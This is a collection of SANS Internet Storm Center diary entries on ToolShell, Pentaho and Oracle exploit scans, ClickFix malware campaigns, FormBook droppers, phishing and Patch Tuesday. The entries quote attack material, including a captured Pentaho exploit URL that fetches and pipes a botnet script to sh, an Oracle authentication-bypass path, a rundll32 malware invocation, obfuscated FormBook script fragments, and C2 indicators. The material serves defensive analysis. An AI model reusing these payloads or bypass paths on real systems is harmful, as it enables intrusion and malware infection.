Once our payload is decoded, we see that it contains a known malicious .NET Dynamiclink Library (DLL) binary named osvmhdfl.dll. If this in-memory payload was executed successfully on a vulnerable SharePoint server, it could extract machine keys and other system information and return the information in the HTTP response [9].

 

Figure 8: Partially decoded method containing a malicious payload.

 

Additional Payloads Discovered

Using this process, I have discovered security scanner payloads and payloads containing encoded PowerShell commands.

Nuclei Scanner Template CVE-2025-53770

The Project Discovery Nuclei Scanner, when using the http template CVE-2025-53770, sends the payload in Figure 9. This payload contains the .NET Dynamic-link Library (DLL) binary named jlaneafi.dll. If the SharePoint server is vulnerable, an additional HTTP response header of X-Nuclei is returned with a value of CVE-2025-53770 [10].

 

Figure 9: Partially decoded method containing a Nuclei Scanner template CVE-2025-53770 payload.

 

Encoded PowerShell Commands

I have seen variations of the payload in Figure 10 that contain encoded PowerShell commands.

 

Figure 10: Partially decoded method containing an encoded PowerShell payload.

 

Decoding the EncodedCommand value exposes the PowerShell command in Figure 11 below. If this PowerShell executed successfully it could extract system information and send that information to the threat actor’s server on port 40443.

 

Figure 11: Decoded PowerShell command.

 

Conclusion

We have completed our hunt, found our in-memory ToolShell exploit payload, and have seen additional payloads found in the wild. Use this process to hunt for payloads in your own environment and discover what new techniques threat actors are attempting against on-premise SharePoint servers vulnerable to the ToolShell exploit chain.

 

References

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-53770
[3] https://nvd.nist.gov/vuln/detail/CVE-2025-53771
[4] https://www.recordedfuture.com/blog/toolshell-exploit-chain-thousands-sharepointservers-risk
[5] https://securelist.com/toolshell-explained/117045/
[6] https://www.activecountermeasures.com/zcutter-more-flexible-zeek-log-processing/
[7] https://github.com/Cisco-Talos/Daemonlogger
[8] https://www.wireshark.org/docs/wsug_html_chunked/AppToolsmergecap.html
[9] https://www.cisa.gov/sites/default/files/2025-08/MAR-251132.c1.v1.CLEAR_.pdf
[10] https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-53770.yaml

 

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

We continue to encounter high-profile vulnerabilities related to the use of URL mapping (or "aliases") with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today:

/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec('wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh')%7D&mgrDn=a&pwd=a

This request attempts to exploit a vulnerability in Hitachi Vantara Pentaho Business Analytics Server (CVE-2022-43939 and CVE-2022-43769). In this case, the end of the URL (/require.js) bypasses authentication. However, the request is still processed by "ldapTreeNodeChildren", which is vulnerable to a template injection, causing the code to be executed. As last week, it appears that the "Chicago Rapper" Rondo botnet is again exploiting this vulnerability.

However, let's examine the underlying cause of this issue.

For many applications, it makes sense to exempt certain URLs from authentication. For example, help pages, a password reset page, or a customer support contact page may need to be accessible even if the user is not logged in.

Webservers offer a wide range of options to map URLs to files on the web server's file system. For example, for our API, we use this directive in Apache's configuration:

RewriteEngine On
RewriteBase /api
RewriteRule ^.*$ index.html

In NGINX, the "Location" directive is often used to map different URLs to specific files. A very common configuration option in NGINX:

location / {
    try_files $uri $uri/ /index.html;
}

If the actual file is not available, "index.html" will be returned instead of an error page.

None of the examples above is necessarily insecure. However, they must be considered in the context of any access control rules that may be enforced by the application. In particular, Java developers seem to struggle with this issue, possibly due to the complexity of some applications or the use of more application-specific paths in Java applications. 

A common problem is also the misuse of regular expressions. For example, mistaking the literal "." for the regex "arbitrary character" wildcard, or missing anchors (^, $) to terminate strings. When reviewing a web server configuration, carefully review any URL remapping instructions and verify that they do not conflict with any assumptions regarding authentication and access control.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA-X's 1.10.0 release brings a new command: fix warnings.

If you have a rule that would generate a warning with a help section (explaining how to fix it), like this example rule:

 

rule FixableCountWarning
{
    strings:
        $a1 = "malicious"
        $a2 = "badstuff"

    condition:
        0 of ($a*)
}

Then YARA-X from version 1.10.0 on can fix this for you

You will get a warning when you use this rule:

The suggested fix is to replace 0 with none.

This can be done automatically with command fix warnings:

Remark that this command alters your original rule file, and doesn't make a backup of the unaltered file:

 

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark release 4.6.1 fixes 2 vulnerabilities and 20 bugs.

Didier Stevens
Senior handler
blog.DidierStevens.com

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

From time to time, it can be instructive to look at generic phishing messages that are delivered to one’s inbox or that are caught by basic spam filters. Although one usually doesn’t find much of interest, sometimes these little excursions into what should be a run-of-the-mill collection of basic, commonly used phishing techniques can lead one to find something new and unusual. This was the case with one of the messages delivered to our handler inbox yesterday…

The message in question looked quite unremarkable at first glance, as the link it contained pointed to an HTML page located in a Google Firebase Storage, which has been commonly misused by threat actors to save malicious content for many years now[1].

The interesting part still wasn’t apparent when I first opened the page, since, as you can see, it appeared to be a fairly typical credential harvesting page that tried to overlay a fake login prompt over a legitimate page loaded (unsuccessfully, in the case of isc.sans.edu, due to our Content Security Policy and X-Frame-Options settings) from a domain extracted from a personalized link sent to the recipient of the original phishing message…

What turned out to be unusual was the source code of this page. Although it was 449 KB in size, it contained only about 10 KB (or roughly 250 lines of code) that was actually used when the page was rendered. The remaining hundreds of kilobytes were made up of unused style data – most of it was renamed and/or slightly modified copy-pasted CSS code that was actually used in the page, and about a third of it consisted of a copy of bootstrap.min.css.

Since the copy-pasting of CSS code was certainly intentional, this “CSS stuffing” approach (along with the use of <html lang="zxx"> in the page header[2]) seems to me to have been a fairly unusual attempt at bypassing some of the less effective security filtering mechanisms.

While the size of the file on its own would most likely not be enough to bypass any security scanner used to analyze HTTP traffic altogether, given that most of these tend to have scan limits for file sizes at least in the tens of megabytes range, the amount of benign-looking CSS code might perhaps be enough to change the statistical profile of the HTML page sufficiently to enable the file to pass through some heuristic or machine-learning based systems unnoticed.

Admittedly, this is just speculation, but it is certainly the best explanation for this strange use of CSS code I can think of…

[1] https://blog.knowbe4.com/phishing-campaigns-using-google-firebase-storage
[2] https://www.w3.org/International/questions/qa-no-language

-----------
Jan Kopriva
LinkedIn
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Searchlight Cyber today released a blog detailing CVE-2025-61757, a vulnerability they reported to Oracle. Oracle released a patch for the vulnerability as part of its October Critical Patch Update, which was released on October 21st.

Based on Searchlight Cyber's blog, the issue is pretty trivial to exploit: All URLs that end in ".wadl" are exempt from authentication. Adding just ".wadl" to a URL would not work, as this would point to a different, non-existent file. Searchlight Cyber's blog shows that adding ";.wadl" is the solution to access arbitrary URLs. They offer the following PoC:

/iam/governance/applicationmanagement/templates;.wadl

and show how it can lead to remote code execution.

Seeing this PoC, I went over our logs to look for possible uses of this pattern and found one:

/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl

This URL was accessed several times between August 30th and September 9th this year, well before Oracle patched the issue. There are several different IP addresses scanning for it, but they all use the same user agent, which suggests that we may be dealing with a single attacker.

Attacker IP Addresses:

89.238.132.76
185.245.82.81
138.199.29.153

The User Agent: 

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

Sadly, we did not capture the bodies for these requests, but they were all POST requests. The content-length header indicated a 556-byte payload.

The participating IP addresses also scanned for these notable URLs/Vulnerabilities:

/o/portal-settings-authentication-opensso-web/com.liferay.portal.settings.web/test_opensso.jsp (CVE-2025-4581)

as well as some scans that appear to be bug bounties and URLs that attempt to exploit Log4j.

 

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

When people discuss the security implications of Unicode, International Domain Names (IDNs) are often highlighted as a risk. However, while visible and often talked about, IDNs are probably not what you should really worry about when it comes to Unicode. There are several issues that impact application security beyond confusing domain names.

At first sight, Unicode is a standard that assigns numbers to characters [1]. It extends the ASCII standard, which only allowed for 127 different characters, to an essentially unlimited range of characters. With Unicode, we also have various encoding schemes, such as UTF-8 and UTF-16, that regulate how the respective code is expressed as a multi-byte value.

Unicode version 17.0 defines 159,801 different characters. This includes not only characters for various languages but also emojis and math symbols.

Here are some of the issues that are often overlooked:

Confusables

When discussing domain names, one issue that arises is the use of characters that are easily confused. The Unicode project has a tool to identify them [2]. But this issue goes beyond domain names. If you allow the full Unicode character set for usernames, users may be able to impersonate other users on your platform. This has frequently happened on X [3]. However, other platforms, such as internal messaging systems, could also be abused in similar ways. 

Normalization and Best Fit Mapping

These techniques aim to address the issue that some systems are unable to represent the entire Unicode character range, but offer similar characters that can be used to represent these "missing" characters. The "confusable" tool mentioned above is also helpful to identify them. In its worst form, this could convert an otherwise harmless character, like a "FULLWIDTH GRAVE ACCENT", into a single quote, bypassing filters to prevent injection vulnerabilities. The key defense is to avoid any conversion after a string has passed input validation. However, unintentional conversion can happen on some platforms as data is inserted into databases.

Variant Selectors

"Variant Selectors" are non-printable ("invisible") Unicode code points that are used to specify an alternate representation of a given character. They may be used by first specifying a "normal" character, followed by a variant selector, and then an alternative character, such as an emoji. There are sixteen possible variant selectors. Selector-16 (#FE0F) would be used to define an emoji representation for a given character. Variant selectors were recently abused in the "Glass Worm" attack against VS Code extensions. In this case, variant selectors were used because they are not visible; they were used solely to encode obfuscated code snippets. The "Glass Worm" used sequences of variant selectors without following them up with an alternative glyph, which is not standard-compliant. Usually, each variant selector should be followed by a glyph.

Text Direction

Most languages are written/read left to right, and this is the default in most operating systems and editors. However, some languages use right-to-left. Unicode defines a "right-to-left (0x200F)" and "left-to-right (0x200E)" mark to indicate the direction. The direction may be changed at any point in the document. There are a few other Unicode code points that allow swapping the direction text is rendered (0x202A-E). Different text directions can be abused to make code reviews more difficult. A human reviewer will typically not see the change in direction, while a compiler or interpreter will, and as a result the code execution is different from what the human reviewer observed. There is a nice demo of this issue at trojansource.code [5]

[1] https://unicode.org/
[2] https://util.unicode.org/UnicodeJsps/confusables.jsp
[3] https://isc.sans.edu/diary/28440
[4] https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace
[5] https://trojansource.codes/

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

Today's diary is an example of KongTuke activity using fake CAPTCHA pages for a ClickFix-style lure.

Also known as LandUpdate808 or TAG-124 and described as a sophisticated TDS system, KongTuke has been active since at least May 2024.  I keep track of this campaign through the infosec.exchange Mastodon instance, which is mostly information from the @monitorsg profile.

With URLscan, I can pivot on the information from Mastodon to find compromised sites and generate infection traffic in my lab.

On Monday, 2025-11-17, I found an example of a legitimate website with a KongTuke-injected script, and I generated some infection traffic.

Details

The image below shows an example of the fake CAPTCHA page and ClickFix style instructions.

Shown above: Fake CAPTCHA page from a legitimate site with KongTuke-injected script, with the ClickFix style instructions and malicious command.

The CAPTCHA page hijacks the clipboard, injecting text for a malicious command to download and run PowerShell script. Potential victims would read the instructions and paste this command into Run window.

I tried this on a vulnerable Windows client in an Active Directory (AD) environment, and it ran PowerShell script that retrieved a zip archive containing a malicious Python script, as well as the Windows Python environment to run it.

The malicious Python script generated HTTPS traffic to telegra[.]ph, but I was unable to determine the URL or content of the traffic.

Shown above: Traffic from the infection, filtered in Wireshark.

Shown above: Initial PowerShell script retrieved by the ClickFix command that was pasted into the Run window.

Shown above: Final HTTP request from the initial infection traffic returned a zip archive containing a Python environment and a malicious Python script.

Post-Infection Forensics

The malicious Python package was saved to the Windows client under the user account's AppData\Roaming directory under a folder named DATA. A scheduled task kept the infection persistent.

Shown above: The malicious Python script, made persistent on the infected Windows client through a scheduled task.

Indicators from the infection

The following URLs were generated during the initial infection traffic:

• hxxp[:]//64.111.92[.]212:6655/ab
• hxxp[:]//64.111.92[.]212:6655/se
• hxxp[:]//64.111.92[.]212:6655/node
• hxxp[:]//64.111.92[.]212:6655/nada000

For post-infection traffic, telegra[.]ph is a publishing tool that allows people to create and share simple web pages. I don't know the specific URL used for this infection, and the domain itself is not malicious.

The following is the zip archive containing the Windows Python environment and the malicious Python script.

• SHA256 hash: b2e084a9cab46b01cfa8725c3cc23ef5cc2a4e399d83ff760e4bdb8b028ec6f6
• File size: 24,946,416 bytes
• File type: Zip archive data, at least v2.0 to extract, compression method=deflate
• File location: hxxp[:]//64.111.92[.]212:6655/nada000

Final Words

I'm not sure what the script from this malicious Python package actually does.  If anyone knows what this is, feel free to leave a comment.

---
Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In diary entry "Formbook Delivered Through Multiple Scripts", Xavier mentions that the following line:

Nestlers= array(79+1,79,80+7,60+9,82,83,72,69,76,76)

decodes to the string POWERSHELL.

My tool numbers-to-hex.py is a tool that extracts numbers from text files, and converts them to hexadecimal.

Like this:

I can then use another tool, hex-to-bin.py to convert the hexadecimal numbers to binary, and then we see this string:

This string is not exactly the string POWERSHELL, but we can see parts of it.

The reason the decoding fails, is because of binary numeric expressions like this one: 79+1

My tool numbers-to-hex.py does not recognize binary numeric expressions like 79+1, it just recognizes two numbers: 79 and 1.

79 converted to hexadecimal is 4f, and 1 converted to hexadecimal is 01.

Those hex numbers converted to ASCII give O (4f) and a smiley (01).

So Xavier's example inspired me to update my tool, so that it can also handle binary numeric expressions (binary here means that the operator, + in our example, takes 2 operands).

You enable this mode with option -e:

So this time, 79+1 is converted to 50 hexadecimal.

And this properly decodes this obfuscated string:

 

 

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The finger.exe command is used in ClickFix attacks.

finger is a very old UNIX command, that was converted to a Windows executable years ago, and is part of Windows since then.

In the ClickFix attacks, it is used to retrieve a malicious script via the finger protocol.

We wrote about finger.exe about 3 years ago: "Finger.exe LOLBin".

What you need to know:

• finger communication takes place over TCP
• the finger protocol uses TCP port 79 and there is no way to change this port
• finger.exe is not proxy aware

So if you are in a corporate environment with an explicit proxy (and blocking all Internet facing communication that doesn't go through the proxy), the finger.exe command won't be able to communicate.

And if you have a transparent proxy, finger.exe will be able to communicate provided the proxy allows TCP connections to port 79.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The SANS Holiday Hack Challenge™ 2025 is available.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Like many have reported, we too noticed exploit attempts for CVE-2025-64446 in our honeypots.

These are POST requests to this path:

With this User Agent String:

And this is the data of the POST request:

This creates a new admin user (profile: prof_admin).

You can find this JSON data back in this PoC.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

You probably know what are the Russian or Matryoshka dolls. It's a set of wooden dolls of decreasing size placed one inside another[1]. I found an interesting Microsoft Office document that behaves like this. There was a big decrease in malicious Office documents due to the new Microsoft rules to prevent automatic VBA macros execution. But they remain used, especially RTF documents that exploits the good %%cve:2017-11882%%.

The document (SHA256:8437cf40bdd8b005b239c163e774ec7178195f0b80c75e8d27a773831479f68f) that I found uses another technique to prevent the RTF document to be spread directly to the victim. The RTF document is placed into the OOXML document:

remnux@remnux:~/malwarezoo/20251113$ zipdump.py mexico_november_po.docx
Index Filename Encrypted Timestamp
1 _rels/ 0 2025-10-22 21:55:10
2 docProps/ 0 2025-10-22 21:55:10
3 word/ 0 2025-11-12 02:58:50
4 [Content_Types].xml 0 2025-10-22 21:55:22
5 docProps/app.xml 0 1980-01-01 00:00:00
6 docProps/core.xml 0 1980-01-01 00:00:00
7 word/_rels/ 0 2025-10-22 21:55:10
8 word/theme/ 0 2025-10-22 21:55:10
9 word/document.xml 0 2025-11-12 02:59:04
10 word/endnotes.xml 0 1980-01-01 00:00:00
11 word/Engaging.rtf 0 2025-11-12 02:58:34
12 word/fontTable.xml 0 1980-01-01 00:00:00
13 word/footer1.xml 0 1980-01-01 00:00:00
14 word/footnotes.xml 0 1980-01-01 00:00:00
15 word/numbering.xml 0 1980-01-01 00:00:00
16 word/settings.xml 0 1980-01-01 00:00:00
17 word/styles.xml 0 1980-01-01 00:00:00
18 word/webSettings.xml 0 1980-01-01 00:00:00
19 word/theme/theme1.xml 0 1980-01-01 00:00:00
20 word/_rels/document.xml.rels 0 2025-11-12 02:58:58
21 word/_rels/settings.xml.rels 0 1980-01-01 00:00:00
22 _rels/.rels 0 1980-01-01 00:00:00

The file is referenced in the Word document:

remnux@remnux:~/malwarezoo/20251113$ zipdump.py mexico_november_po.docx -s 20 -d | grep Engaging.rtf
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
...
<Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/aFChunk" Target="/word/Engaging.rtf" Id="YAjq8U"/>
</Relationships>

remnux@remnux:~/malwarezoo/20251113$ zipdump.py mexico_november_po.docx -s 9 -d | grep YAjq8U
<w:document xmlns:wpc=“http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas” 
...
<w:body><w:altChunk r:id=“YAjq8U”/>
...
</w:document>

The RTF document contains a shellcode that triggers the Equation Editor exploit. The next payload is C:\Users\user01\AppData\Local\Temp\license.ini. It's a DLL (SHA256:d8ed658cc3d0314088cf8135399dbba9511e7f117d5ec93e6acc757b43e58dbc) that is invoked with the following function: IEX

CmD.exe /C rundll32 %tmp%\license.ini,IEX A\x12\x0cC

You can see the special characters used as parameters to the function here:

This DLL is pretty well obfuscated, I'l still having a look at it but the malware family is not sure... Maybe another Formbook.

[1] https://en.wikipedia.org/wiki/Matryoshka_doll

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

When I’m teachning FOR610[1], I always say to my students that reverse engineering does not only apply to “executable files” (read: PE or ELF files). Most of the time, the infection path involves many stages to defeat the Security Analyst or security controls. Here is an example that I found yesterday. An email was received via an attached ZIP archive. It contained a simple file: “Payment_confirmation_copy_30K__202512110937495663904650431.vbs” (SHA256:d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f) identified by 17/65 antiviruses on VT[2]. Let’s have a look at the infection path.

The VBS script was obfuscated but easy to reverse. First it started with a delay loop of 9 seconds:

Dim Hump
Hump = DateAdd(“s”, 9, Now())
Do Until (Now() > Hump)
    Wscript.Sleep 100
    Frozen = Frozen + 1
Loop

This allow the script to wait before performing nasty actions and avoid using the sleep() function which is often considered as suspicious. Then the script will generate a PowerShell script by concatenating a lot of strings. The “PowerShell” string is hidden behind this line:

Nestlers= array(79+1,79,80+7,60+9,82,83,72,69,76,76)

The script is reconstructed like this:

Roastable11 = Roastable11 + “mv 'udenri”
Roastable11 = Roastable11 + “gstjenes”
Roastable11 = Roastable11 + “te’;”
Roastable11 = Roastable11 + “function "
Roastable11 = Roastable11 + “Microcoulomb”
Roastable11 = Roastable11 + " ($s”
Roastable11 = Roastable11 + “kattes”
Roastable11 = Roastable11 + “kemas='sel”
Roastable11 = Roastable11 + “vang”
Roastable11 = Roastable11 + “av’)”
...

The result is executed with an Shell.Application object. The PowerShell script is also heavily obfuscated. Two functions are used for this purpose:

function Microcoulomb ($skatteskemas=‘selvangav’)
{
    $bletr=4;
    do {
        folkesangeren+=skatteskemas[$bletr];
        $bletr+=5;
        overhringens=Get-Date
    }
    until (!skatteskemas[$bletr]);
    $folkesangeren
}

function Blokbogstavers65 ($srlings)
{
    countryish22(srlings)
}

The second function just invokes an “Invoke-Expression” with the provided string. The first one reconstrusts strings by extraction some characters from the provided one. Example:

$mesoventrally=Microcoulomb ’ :::n TTTEJJJJTjjjj.nnnnw::::E’;
$mesoventrally+=Microcoulomb ‘i iiB SSSCccc l EE INNNNe * *n;;;;t’;

The variable meseventrally will containt “nET.wEBClIent”.

The first part of the deobfuscated script will prepare the download of the next payload:

while ((!brandmesterens))
{
    Blokbogstavers65 (Microcoulomb '...’) ;
    Blokbogstavers65 retsforflgende;
    Blokbogstavers65 (Microcoulomb '...');
    Blokbogstavers65 (Microcoulomb '...') ;
    Blokbogstavers65 (Microcoulomb '...’) ;
    fedayee=serigraphic[$dichotomically]
}

The loop waits for a successful download from ths URL: hxxps://drive[.]google[.]com/uc?export=download&id=1jFn0CatcuICOIjBsP_WxcI_faBI9WA9S

It stores the payload in C:\Users\REM\AppData\Roaming\budene.con. Once decoded, it’s another piece of PowerShell that also implements deobfuscation functions.

The script will invoke an msiexec.exe process and inject the FormBook into it. The injected payload is C:\Users\REM\AppData\Local\Temp\bin.exe (SHA256:12a0f592ba833fb80cc286e28a36dcdef041b7fc086a7988a02d9d55ef4c0a9d)[3]. The C2 server is 216[.]250[.]252[.]227:7719.

Here is an overview of the activity generated by all the scripts on the infected system:

[1] https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques
[2] https://www.virustotal.com/gui/file/d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f
[3] https://www.virustotal.com/gui/file/12a0f592ba833fb80cc286e28a36dcdef041b7fc086a7988a02d9d55ef4c0a9d

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

This diary describes a NetSupport RAT infection I generated in my lab from the SmartApeSG campaign that used a ClickFix-style fake CAPTCHA page.

Known as ZPHP or HANEYMANEY, SmartApeSG is a campaign reported as early as June 2024. When it started, this campaign used fake browser update pages. But it currently uses the ClickFix method of fake CAPTCHA-style "verify you are human" pages.

This campaign pushes malicious NetSupport RAT packages for its initial malware infection, and I've seen follow-up malware from these NetSupport RAT infections.

How To Find SmartApeSG Activity

I can usually find SmartApeSG indicators from the Monitor SG account on Mastodon. I use URLscan to pivot on those indicators, so I can find compromised websites that lead to the SmartApeSG script.

The Infection

Sites compromised through this campaign display pages with a hidden injected script. Given the right conditions, this script kicks off a SmartApeSG chain of events. The image below shows an example.

Shown above: Injected SmartApeSG script in a page from the compromised site.

In some cases, this injected script does not kick off the infection chain. I've had issues getting an infection chain during certain times of day, or if I try viewing the compromised website multiple times from the same source IP address. I don't know what the conditions are, but if those conditions are right, the compromised site shows a fake CAPTCHA-style "verify you are human" page.

Shown above: Fake CAPTCHA page displayed by the compromised site.

Clicking the "verify you are human" box does the following:

• Injects malicious content into the Windows host's clipboard
• Generates a pop-up with instructions to open a Run window, paste content into the window, and run it.

The clipboard-injected content is a command string that uses the mshta command to retrieve and run malicious content that will generate a NetSupport RAT infection.

Shown above: Following ClickFix directions to paste content (a malicious command) into the Run window.

Below is a URL list of the HTTPS traffic directly involved in this infection.

Shown above: HTTPS traffic directly involved in this SmartApe SG activity.

Shown above: Traffic from the infection filtered in Wireshark.

The malicious NetSupport RAT package stays persistent on the infected host through a Start Menu shortcut. The shortcut runs a .js file in the user's AppData\Local\Temp directory. That .js file runs the NetSupport RAT executable located in a folder under the C:\ProgramData\ directory.

Shown above: The malicious NetSupport RAT package, persistent on an infected Windows host.

Indicators From This Activity

The following URLs were noted in traffic from this infection:

• hxxps[:]//frostshiledr[.]com/xss/buf.js  <-- injected SmartApeSG script
• hxxps[:]//frostshiledr[.]com/xss/index.php?iArfLYKw
• hxxps[:]//frostshiledr[.]com/xss/bof.js?0e58069bbdd36e9a36  <-- fake CAPCHA page/ClickFix instructions
• hxxps[:]//newstarmold[.]com/sibhl.php  <-- Script retrieved by ClickFix command
• hxxps[:]//www.iconconsultants[.]com/4nnjson.zip  <-- zip archive containing malicious NetSupport RAT package
• hxxp[:]//194.180.191[.]121/fakeurl.htm  <-- NetSupport RAT C2 traffic over TCP port 443

The following is the zip archive containing the malicious NetSupport RAT package:

• SHA256 hash: 1e9a1be5611927c22a8c934f0fdd716811e0c93256b4ee784fadd9daaf2459a1
• File size: 9,192,105 bytes
• File type: Zip archive data, at least v1.0 to extract, compression method=store
• File location: hxxps[:]//www.iconconsultants[.]com/4nnjson.zip
• Saved to disk as: C:\ProgramData\psrookk11nn.zip

Note: These domains change on a near-daily basis, and the NetSupport RAT package and C2 server also frequently change.

---
Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today's Microsoft Patch Tuesday offers fixes for 80 different vulnerabilities. One of the vulnerabilities is already being exploited, and five are rated as critical.

Notable Vulnerabilities:

%%cve:2025-62215%%: This vulnerability is already being exploited. It is a privilege escalation vulnerability in the Windows Kernel. These types of vulnerabilities are often exploited as part of a more complex attack chain; however, exploiting this specific vulnerability is likely to be relatively straightforward, given the existence of prior similar vulnerabilities.

%%cve:2025-60274%%: A critical GDI+ remote execution vulnerability. GDI+ parses various graphics files. The attack surface is likely huge, as anything in Windows (Browsers, email, and Office Documents) will use this library at some point to display images. We also have a critical vulnerability in Direct-X %%cve:2025-60716%%. Microsoft classifies this as a privilege escalation issue, yet still rates it as critical.

%%cve:2025-62199%%: A code execution vulnerability in Microsoft Office. Another component with a huge attack surface that is often exploited.

Given the number and type of vulnerabilities, I would consider this patch Tuesday "lighter than normal". There are no "Patch Now" vulnerabilities, and I suggest applying these vulnerabilities in accordance with your vulnerability management program.

 

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
Agentic AI and Visual Studio Code Remote Code Execution Vulnerability
%%cve:2025-62222%%	No	No	-	-	Important	8.8	7.7
An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).
%%cve:2025-60753%%	No	No	-	-	Moderate	5.5	5.2
Azure Monitor Agent Remote Code Execution Vulnerability
%%cve:2025-59504%%	No	No	-	-	Important	7.3	6.4
Configuration Manager Elevation of Privilege Vulnerability
%%cve:2025-47179%%	No	No	-	-	Important	6.7	5.8
Customer Experience Improvement Program (CEIP) Elevation of Privilege Vulnerability
%%cve:2025-59512%%	No	No	-	-	Important	7.8	6.8
DirectX Graphics Kernel Denial of Service Vulnerability
%%cve:2025-60723%%	No	No	-	-	Important	6.3	5.5
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2025-59506%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-60716%%	No	No	-	-	Critical	7.0	6.1
Dynamics 365 Field Service (online) Spoofing Vulnerability
%%cve:2025-62210%%	No	No	-	-	Important	8.7	7.6
%%cve:2025-62211%%	No	No	-	-	Important	8.7	7.6
GDI+ Remote Code Execution Vulnerability
%%cve:2025-60724%%	No	No	-	-	Critical	9.8	8.5
GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability
%%cve:2025-62453%%	No	No	-	-	Important	5.0	4.4
Host Process for Windows Tasks Elevation of Privilege Vulnerability
%%cve:2025-60710%%	No	No	-	-	Important	7.8	6.8
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer
%%cve:2025-64432%%	No	No	-	-	Moderate	4.7	4.5
KubeVirt Arbitrary Container File Read
%%cve:2025-64433%%	No	No	-	-	Moderate	6.5	6.2
KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes
%%cve:2025-64436%%	No	No	-	-	Moderate
KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing
%%cve:2025-64434%%	No	No	-	-	Moderate	4.7	4.5
KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes
%%cve:2025-64437%%	No	No	-	-	Moderate	5.0	4.7
